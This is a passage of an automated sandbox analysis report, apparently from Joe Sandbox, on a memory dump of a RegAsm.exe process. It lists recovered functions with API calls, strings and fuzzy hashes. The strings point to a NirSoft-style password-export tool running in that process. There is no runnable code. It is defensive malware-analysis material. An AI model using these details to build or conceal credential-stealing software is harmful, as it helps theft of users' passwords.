                                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                          • Opcode Fuzzy Hash: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                          APIs
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                          • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                          • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                          • memcmp.MSVCRT ref: 004092D9
                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                          • memcmp.MSVCRT ref: 0040933B
                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                          • memcmp.MSVCRT ref: 00409411
                                                                                                                          • memcmp.MSVCRT ref: 00409429
                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                          • memcmp.MSVCRT ref: 004094AC
                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                          • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                          • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                          • String ID: ---
                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                          • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                          • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1010922700-0
                                                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                          • free.MSVCRT ref: 004186C7
                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                          • free.MSVCRT ref: 004186E0
                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                          • free.MSVCRT ref: 00418716
                                                                                                                          • free.MSVCRT ref: 0041872A
                                                                                                                          • free.MSVCRT ref: 00418749
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                                                          • String ID: |A
                                                                                                                          • API String ID: 3356672799-1717621600
                                                                                                                          • Opcode ID: 1faf5b3adde0534b18c985de7adb1a22e40c93e78ba7e986694d0cab48eb237a
                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                          • Opcode Fuzzy Hash: 1faf5b3adde0534b18c985de7adb1a22e40c93e78ba7e986694d0cab48eb237a
                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1700100422-0
                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                          APIs
                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 552707033-0
                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                          • String ID: %%0.%df
                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                          • String ID: A
                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                          APIs
                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                          • String ID: caption
                                                                                                                          • API String ID: 973020956-4135340389
                                                                                                                          • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                          • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                          • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                          • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                          • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                          • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                          • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf$wcscpy
                                                                                                                          • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                          • API String ID: 1283228442-2366825230
                                                                                                                          • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                          • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                          • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                          • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                          APIs
                                                                                                                          • wcschr.MSVCRT ref: 00413972
                                                                                                                          • wcscpy.MSVCRT ref: 00413982
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                          • wcscpy.MSVCRT ref: 004139D1
                                                                                                                          • wcscat.MSVCRT ref: 004139DC
                                                                                                                          • memset.MSVCRT ref: 004139B8
                                                                                                                            • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                            • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                          • memset.MSVCRT ref: 00413A00
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                          • wcscat.MSVCRT ref: 00413A27
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                          • String ID: \systemroot
                                                                                                                          • API String ID: 4173585201-1821301763
                                                                                                                          • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                          • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                          • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                          • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                          • API String ID: 4139908857-2887671607
                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                          • String ID: 4$h
                                                                                                                          • API String ID: 4019544885-1856150674
                                                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                          • String ID: 0$6
                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
